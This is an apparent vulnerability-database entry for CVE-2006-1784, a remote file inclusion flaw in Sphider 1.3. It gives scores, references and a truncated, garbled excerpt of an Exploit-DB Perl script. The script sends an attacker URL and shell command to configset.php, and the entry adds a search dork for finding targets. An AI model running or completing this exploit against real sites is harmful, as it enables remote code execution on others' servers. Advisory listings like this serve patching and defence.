CVE-2006-1784
Published 2006-04-13
Priority: P3 · 42 · medium · 5.1 (CVSS 2.0)
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 7.81% (93.9th percentile)
PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the settings_dir parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sphider | sphider | — | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
No detection rules found.
Exploit-DB
raydium svn 309 - Multiple Vulnerabilities
exploitdb·2006-05-14
CVE-2006-2412 raydium svn 309 - Multiple Vulnerabilities
---
# Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1784.zip (05132006-raydiumx.zip)
Exploit-DB
Sphider 1.3 - 'configset.php' Remote File Inclusion
exploitdb·2006-04-12
CVE-2006-1784 Sphider 1.3 - 'configset.php' Remote File Inclusion
---
#!/usr/bin/perl
use IO::Socket;
print "\r\nSphider works with register_globals = On & allow_url_fopen = On\r\n";
print "by rgod rgodautisticiorg\r\n";
print "site: http://retrogod.altervista.org\r\n";
print "\r\ndork: \"powered by sphider\"\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
$cmd=""; for ($i=3; $i\r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
print $sock "H
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/19642
- http://www.securityfocus.com/bid/17514
- http://www.vupen.com/english/advisories/2006/1341
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25780
- https://www.exploit-db.com/exploits/1665
Published: 2006-04-13